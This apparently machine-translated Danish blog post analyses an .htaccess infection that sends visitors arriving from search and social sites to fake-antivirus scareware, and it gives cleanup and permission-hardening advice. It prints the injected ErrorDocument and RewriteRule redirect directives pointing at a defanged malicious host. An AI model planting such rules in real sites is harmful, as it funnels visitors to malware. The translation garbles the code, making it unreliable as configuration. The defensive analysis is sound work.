Malware / Virus - .htaccess "omskriv" og omdirigering

En ny form for virus som jeg ser ikke meget, påvirker sites hostes på upålidelige servere hvor brugerkonti / underdomænekonto kan "ses" mellem dem. Specifikt placeres hostingkontiene alle i mappen "vhosts", og skrivningsretten til brugermappe fra "vhosts" gives til en almindelig bruger ... af forhandleren i de fleste situationer. Det er en typisk metode til webservere, der ikke bruger WHM / cPanel.

.Htaccess virushandling - .htaccess hack

Virus påvirke filer .htaccess Site of offeret. Jeg tilføjede linier / Direktiv til omdirigere besøgende (kommer fra yahoo, msn, google, facebook, yaindex, twitter, myspace osv. websteder med høj trafik og portaler) til nogle websteder, der tilbyder "antivirus". Det handler om falske antivirus, Som jeg skrev i indledningen til .

Dette er hvordan en .htaccess påvirkes: (ikke få adgang til indhold webadresser i følgende linjer)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

OmskrivningEngin On

RewriteCond% {HTTP_REFERER}. * Yandex. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Odnoklassniki. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vkontakte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Rambler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Tube. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wikipedia. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Baidu. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Qq.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Myspace. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Twitter. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Facebook. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Google. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Live. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * AOL. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Bing. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Amazon. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ebay. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LinkedIn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Flickr. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Livejasmin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Soso. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * DoubleClick. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Pornhub. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Orkut. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJournal. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wordpress. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Yahoo. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ask. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * AltaVista. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Netscape. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * HotBot. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Goto. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Infoseek. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mamma. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Alltheweb. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Search. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MetaCrawler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mail. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Dogpile. * $ [NC]

OmskrivningCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = r [R, L]

RewriteCond% {REQUEST_FILENAVN}! -F
RewriteCond% {REQUEST_FILESOM HEDDER
RewriteCond% {REQUEST_FILENAVN}! * Jpg $ |. * Gif $ |. * Png $
OmskrivningCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = 4 [R, L]

Dem, der bruger WordPress vil finde disse linjer i filen .htaccess fra public_html. Desuden skaber virus en. Identisk htaccess i mappen wp-indhold.

*Der er også situationer, hvor stedet opstår peoriavascularsurgery.com dns.thesoulfoodcafe.com eller andre adresser.

Hvad gør denne virus.

Når omdirigeret er den besøgende mødt med åbne arme af meddelelsen:

Advarsel!
Din computer indeholder forskellige tegn på tilstedeværelse af vira og malware-programmer. jeres system kræver øjeblikkelig anti-virus kontrol!
System Sikkerhed udfører en hurtig og gratis scanning af din pc for vira og ondsindede programmer.

1 malware

Uanset hvilken knap vi trykker på, føres vi til "Denne computer", skabt til at efterligne design XP. Det er her, "scanningsprocessen" starter automatisk, i slutningen af ​​hvilken vi opdager, at "vi er inficeret".

2 malware

Når du klikker på OK eller Annuller, vil det begynde downloadeFilens setup.exe. dette setup.exe er falsk anti-virus påvirker systemet. Du installerer nogle malware at udbrede yderligere links virus, og udover disse en anti-virus software (også falsk), som offeret er inviteret til at købe.
De, der allerede kontaktet virus kan bruge denne formular . Det anbefales også at scanne hele harddisken. Anbefal Kaspersky Internet Security eller Kaspersky Anti-Virus.

Denne type virus påvirker besøgende OS operativsystemer Windows XP, Windows ME Windows 2000, Windows NT Windows 98 si Windows 95. Indtil videre har ingen kendte tilfælde af infektion i operativsystemerne Windows Syn ja Windows 7.

Hvordan kan vi fjerne denne virus. Htaccess fil på serveren, og hvordan man kan forebygge infektion.

1. Analysere mistænkelige filer og sletning koder. At sikre, at filen ikke påvirkes kun .htaccess er bedre analysere alle filer . Php si . Js.

2. Rewriting fil. Htaccess og jeg indstille chmod 644 eller 744 med skriveadgang kun bruger ejeren.

3. Når du opretter en hosting konto for en hjemmeside i mappen / home eller / Webroot Dette vil automatisk oprette en mappe som ofte har brugerens navn (bruger for cpanel, ftp, Etc.). Til at forhindre skrivning data og overførsel af virus fra én bruger til en anden, anbefales det, at hver bruger mappe, der skal indstilles:

chmod 644 eller 744, 755 - angivet er 644.
chown-R nume_user nume_folder.
chgrp-R nume_user nume_folder

ls-all måder at kontrollere, hvis de blev foretaget korrekt. Skal vises noget som dette:

drwx - x - x 12 dinamik dinamik 4096 6. maj 14:51 dinamik /
drwx - x - x 10 duran duran 4096 Mar 7 07:46 duran /
drwx - x - x 12 reagensglas reagensglas 4096 Jan 29 11:23 reagensglas /
drwxr-xr-x 14 express express 4096 26. februar 2009 express /
drwxr-xr-x 9 ezo ezo 4096 19. maj 01:09 ezo /
drwx - x - x 9 farma farma 4096 19. december 22:29 farma /

Hvis et af ovenstående vil være userele FTP Inficerede filerDet kan ikke sende virus til en anden bruger vært. Det er et minimum sikkerhedsnet til at beskytte konti hostes på en webserver.

Fælles elementer i de områder, der berøres af denne type virus.

Alle berørte domæner omdirigerer besøgende til websteder, der indeholder domænenavnet "/".

Dette "virus. htaccess"påvirker enhver form for CMS (Joomla, WordPress, phpBBOsv.), der bruger .htaccess

.htaccess Virus Hack & Redirect.

Malware / Virus - .htaccess "omskriv" og omdirigering

Om forfatteren

Stealth LP

Stifter og redaktør Stealth SettingsI 2006 dato.
Erfaring med Linux-operativsystemer (især CentOS), Mac OS X, Windows XP> Windows 10 og WordPress (CMS).

Efterlad en kommentar